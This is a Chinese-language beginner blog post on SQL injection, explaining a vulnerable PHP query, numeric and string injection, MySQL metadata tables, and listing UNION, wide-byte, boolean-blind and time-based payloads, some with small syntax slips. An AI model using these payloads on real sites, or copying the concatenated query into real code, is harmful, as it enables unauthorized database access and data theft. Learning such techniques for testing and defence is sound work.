<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="AJDX3906采坑之路"><title>Sql注入总结 | AJDX3906的营养目标</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=1.0.0"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/normalize.css/normalize.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/pure-min.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/grids-responsive-min.css"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery/dist/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/clipboard/dist/clipboard.min.js"></script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.js"></script><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.css"><meta name="generator" content="Hexo 5.3.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">Sql注入总结</h1><a id="logo" href="/.">AJDX3906的营养目标</a><p class="description">Code the Future, change the world!</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a><a href="/atom.xml"><i class="fa fa-rss"> 订阅</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">Sql注入总结</h1><div class="post-meta">2019-02-20<span> | </span><span class="category"><a href="/categories/Web-security/">Web-security</a></span></div><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">文章目录</div><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86"><span class="toc-number">1.</span> <span class="toc-text">SQL注入原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E7%B1%BB"><span class="toc-number">2.</span> <span class="toc-text">注入漏洞分类</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Mysql%E4%B8%AD%E5%B8%B8%E8%A7%81%E5%87%BD%E6%95%B0"><span class="toc-number">3.</span> <span class="toc-text">Mysql中常见函数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Mysql%E6%95%B0%E6%8D%AE%E5%BA%93%E5%85%83%E4%BF%A1%E6%81%AF"><span class="toc-number">4.</span> <span class="toc-text">Mysql数据库元信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Mysql%E5%B8%B8%E7%94%A8%E8%AF%AD%E5%8F%A5%E6%80%BB%E7%BB%93"><span class="toc-number">5.</span> <span class="toc-text">Mysql常用语句总结</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%B8%B8%E8%A7%84%E6%B3%A8%E5%85%A5"><span class="toc-number">5.1.</span> <span class="toc-text">常规注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="toc-number">5.2.</span> <span class="toc-text">宽字节注入</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#boolean%E7%9B%B2%E6%B3%A8"><span class="toc-number">5.3.</span> <span class="toc-text">boolean盲注</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%BB%B6%E6%97%B6%E6%B3%A8%E5%85%A5"><span class="toc-number">5.4.</span> <span class="toc-text">延时注入</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99%EF%BC%9A"><span class="toc-number">6.</span> <span class="toc-text">参考资料：</span></a></li></ol></div></div><div class="post-content"><p>SQL注入漏洞是Web层面最高危的漏洞之一，在最新的2017年OWASP年度是大漏洞排行中排第一。</p>
<a id="more"></a>  

<h3 id="SQL注入原理"><a href="#SQL注入原理" class="headerlink" title="SQL注入原理"></a>SQL注入原理</h3><p>网站的后台SQL查询语句都是动态构造的，构造动态字符串是一种编程技术，它允许开发人员在运行过程中动态构造 SQL 语句，从而创建通用、灵活的应用。</p>
<p>例如在 php 中动态构造 SQL 语句字符串：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$query</span> = <span class="string">&quot;SELECT * FROM users WHERE username = &quot;</span>.<span class="variable">$_GET</span>[<span class="string">&quot;username&quot;</span>];</span><br></pre></td></tr></table></figure>
<p>看上面代码我们可以控制输入参数 **<u>username</u>**，修改所要执行 SQL 语句，达到攻击的目的。</p>
<hr>
<h3 id="注入漏洞分类"><a href="#注入漏洞分类" class="headerlink" title="注入漏洞分类"></a>注入漏洞分类</h3><p>数字型注入</p>
<p>当输入参数为整型时，如果存在注入漏洞，则为数字型注入。</p>
<p>一般注入流程：</p>
<ol>
<li><p>单引号测试，在参数后面加单引号来判断注入点。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">www.ajdx3906.com/test.php?id=8&#x27;</span><br></pre></td></tr></table></figure></li>
<li><p>Sql查询语句如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from table where id &#x3D; 8&#39;</span><br></pre></td></tr></table></figure>
<p>这里就会执行错误。</p>
</li>
</ol>
<p>字符型注入</p>
<p>当输入参数为字符串时，称为字符型注入。两者最大的区别是，字符型需要用单引号来闭合。</p>
<ol>
<li><p>字符型Sql查询语句如下</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> <span class="keyword">table</span> <span class="keyword">where</span> id <span class="operator">=</span> <span class="string">&#x27;username&#x27;</span></span><br></pre></td></tr></table></figure></li>
<li><p>这时注入需要单引号闭合并注释掉多余的语句。例如输入：【admin’  and 1 = 1 – 】</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> <span class="keyword">table</span> <span class="keyword">where</span> id <span class="operator">=</span> <span class="string">&#x27;admin&#x27;</span>  <span class="keyword">and</span> <span class="number">1</span> <span class="operator">=</span> <span class="number">1</span> <span class="comment">-- &#x27;</span></span><br></pre></td></tr></table></figure></li>
<li><p>这里需要注意一点的是，数据库不同，字符串连接符也不同。</p>
<blockquote>
<p>SQL Server 连接符号为 “+” </p>
<p>Oracle 连接符为“||”</p>
<p>Mysql 连接符为“ ”</p>
</blockquote>
</li>
</ol>
<hr>
<h3 id="Mysql中常见函数"><a href="#Mysql中常见函数" class="headerlink" title="Mysql中常见函数"></a>Mysql中常见函数</h3><p>在进行sql注入过程中，会使用到mysql中的内置函数。在内置函数中，又分为获取信息的函数和功能函数。<br>信息函数是用来获取Mysql中的数据库的信息，功能函数就是传统的函数用来完成某项操作</p>
<p>常用的信息函数：</p>
<ul>
<li>**database()**，用于获取当前所使用的数据库信息</li>
<li><strong>version()</strong>:返回数据库的版本,等价于@@version</li>
<li>**user()**：返回当前的用户，等价如current_user参数。</li>
<li><strong>@@datadir</strong>：获取数据库的存储位置。</li>
</ul>
<p>常用功能函数：</p>
<ul>
<li><p><strong>group_concat()</strong>:用于合并多条记录中的结果。用法如下：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> group_concat(username) <span class="keyword">from</span> users;</span><br><span class="line">#返回的就是users表中所有的用户名，并且是作为一条记录返回。</span><br></pre></td></tr></table></figure></li>
<li><p><strong>substr</strong>：从给定字符串的特定位置返回指定数量的字符。</p>
<p>用法为:substr(str,pos,length)，<strong>pos</strong>表示字符串 str 中的字符串位置</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> substr((<span class="keyword">select</span> database()),<span class="number">1</span>,<span class="number">1</span>);</span><br></pre></td></tr></table></figure>
</li>
</ul>
<hr>
<h3 id="Mysql数据库元信息"><a href="#Mysql数据库元信息" class="headerlink" title="Mysql数据库元信息"></a>Mysql数据库元信息</h3><p>在Mysql中存在information_schema是一个信息数据库，在这个数据库中保存了Mysql服务器所保存的所有的其他数据库的信息，如数据库名，数据库的表，表的字段名称和访问权限。在information_schema中常用的表有:</p>
<ul>
<li><strong>schemata</strong>:存储了mysql中所有的数据库信息，返回的内容与 <code>show databases</code> 的结果是一样的。</li>
<li><strong>tables</strong>:存储了数据库中的表的信息。详细地描述了某个表属于哪个schema，表类型，表引擎。<br><code>show tables from schema</code> 的结果就是来自这个表</li>
<li><strong>columns</strong>:详细地描述了某张表的所有的列以及每个列的信息。<br><code>show columns from users</code> 的结果就是来自这个表</li>
<li>下面就是利用以上的3个表来获取数据库的信息。</li>
</ul>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> database(); #查选数据库</span><br><span class="line"><span class="keyword">select</span> schema_name <span class="keyword">from</span> information_schema.schemata;  #查询数据库</span><br><span class="line"><span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>database();  #查询表</span><br><span class="line"><span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name<span class="operator">=</span><span class="string">&#x27;users&#x27;</span>;  #查询列</span><br></pre></td></tr></table></figure>
<hr>
<h3 id="Mysql常用语句总结"><a href="#Mysql常用语句总结" class="headerlink" title="Mysql常用语句总结"></a>Mysql常用语句总结</h3><h4 id="常规注入"><a href="#常规注入" class="headerlink" title="常规注入"></a>常规注入</h4><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; order by num #        确定字段长度</span><br><span class="line">1&#x27; union select 1,2,3 #  确定字段长度</span><br><span class="line">-1&#x27; union select 1,2,3 # 判断页面中显示的字段</span><br><span class="line">-1&#x27; union select 1,2,group_concat(schema_name) from information_schema.schemata #查询数据库</span><br><span class="line">-1&#x27; union select 1,2 group_concat(table_name) from information_schema.tables where table_schame = &quot;dbname&quot;/database()/hex(dbname) #  查询表</span><br><span class="line">-1&#x27; union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&quot;table_name&quot;/hex(table_name) #   查询列</span><br><span class="line">-1&#x27; union select 1,2,3 AND &#x27;1&#x27;=&#x27;1     在注释符无法使用的情况下</span><br></pre></td></tr></table></figure>
<h4 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h4><p>​    宽字节注入是由编码不统一造成的，一般存在于 PHP+Mysql中。在php配置文件<em>php.ini</em>中存在<em>magic_quotes_gpc</em>选项，此选项开启，会自动将接收的单引号、双引号、反斜线和NULL字符自动加上一个反斜线转义。</p>
<p>​    至此就会导致无法闭合单引号，一般使用“ <strong>%d5’</strong> ” 或 “**%df**” 来绕过</p>
<h4 id="boolean盲注"><a href="#boolean盲注" class="headerlink" title="boolean盲注"></a>boolean盲注</h4><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; and ascii(substr(select database(),1,1))&gt;99</span><br><span class="line">1&#x27; and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))&gt;90</span><br></pre></td></tr></table></figure>
<h4 id="延时注入"><a href="#延时注入" class="headerlink" title="延时注入"></a>延时注入</h4><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; AND select if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)=&#x27;e&#x27;,sleep(10),null) --+</span><br><span class="line">1&#x27; AND select if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=&#x27;e&#x27;,sleep(10),null) --+</span><br></pre></td></tr></table></figure>
<hr>
<p>仅对 SQL 注入进行了一个简单的入门知识的讲解，后面会进行一些详细的总结和实测。</p>
<hr>
<h3 id="参考资料："><a href="#参考资料：" class="headerlink" title="参考资料："></a>参考资料：</h3><p><a target="_blank" rel="noopener" href="https://blog.spoock.com/2016/06/28/sql-injection-1/">sql注入入门</a></p>
<p><a target="_blank" rel="noopener" href="https://bbs.ichunqiu.com/thread-9668-1-1.html">sql注入</a></p>
</div><div class="tags"><a href="/tags/%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/"><i class="fa fa-tag"></i>安全基础知识</a></div><div class="post-nav"><a class="pre" href="/2019/08/08/%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">机器学习笔记</a><a class="next" href="/2019/02/18/%E5%AD%97%E9%95%BF%E3%80%81%E5%AD%97%E8%8A%82%E3%80%81%E4%BD%8D/">字、字长、字节、位</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><form class="search-form" action="//www.google.com/search" method="get" accept-charset="utf-8" target="_blank"><input type="text" name="q" maxlength="20" placeholder="Search"/><input type="hidden" name="sitesearch" value="https://AJDX3906.github.io"/></form></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/C%E8%AF%AD%E8%A8%80/">C语言</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Misc/">Misc</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Web-security/">Web-security</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/Webug/">Webug</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E9%9A%8F%E7%AC%94/">随笔</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/%E6%9D%82%E8%B0%88/" style="font-size: 15px;">杂谈</a> <a href="/tags/Burp-suite/" style="font-size: 15px;">Burp suite</a> <a href="/tags/sql%E6%B3%A8%E5%85%A5/" style="font-size: 15px;">sql注入</a> <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" style="font-size: 15px;">文件上传漏洞</a> <a href="/tags/XSS/" style="font-size: 15px;">XSS</a> <a href="/tags/%E5%9B%BE%E7%89%87%E9%9A%90%E5%86%99%E6%9C%AF/" style="font-size: 15px;">图片隐写术</a> <a href="/tags/%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" style="font-size: 15px;">安全基础知识</a> <a href="/tags/Web%E5%AE%89%E5%85%A8/" style="font-size: 15px;">Web安全</a> <a href="/tags/CTF/" style="font-size: 15px;">CTF</a> <a href="/tags/%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%A7%A3%E5%AF%86/" style="font-size: 15px;">字符串解密</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> 最近文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/08/08/%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">机器学习笔记</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/20/sql%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/">Sql注入总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/18/%E5%AD%97%E9%95%BF%E3%80%81%E5%AD%97%E8%8A%82%E3%80%81%E4%BD%8D/">字、字长、字节、位</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/17/Webug%E6%B8%97%E9%80%8F%E6%95%99%E7%A8%8BV/">Webug渗透教程IV</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/14/Webug%E6%B8%97%E9%80%8F%E6%95%99%E7%A8%8BIV/">Webug渗透教程IV</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/11/Webug%E6%B8%97%E9%80%8F%E6%95%99%E7%A8%8BIII/">Webug渗透教程III</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/09/Webug%E6%B8%97%E9%80%8F%E6%95%99%E7%A8%8B%E2%85%A1/">Webug渗透教程Ⅱ</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/07/Webug%E6%B8%97%E9%80%8F%E6%95%99%E7%A8%8B%E2%85%A0/">Webug渗透教程I</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/05/nazo.io%E9%A2%98%E8%A7%A3/">nazo.io</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/25/Web%E5%AE%89%E5%85%A8%E6%80%BB%E7%BB%93/">Web安全总结</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div><ul></ul><a href="https://weiweiyoo.github.io" title="weiweiyoo" target="_blank">weiweiyoo</a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2021 <a href="/." rel="nofollow">AJDX3906的营养目标.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=1.0.0" async></script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=1.0.0" async></script><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.css"><script type="text/javascript" src="/js/copycode.js" successtext="复制成功!"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css"><script type="text/javascript" src="/js/codeblock-resizer.js?v=1.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=1.0.0"></script></div></body></html>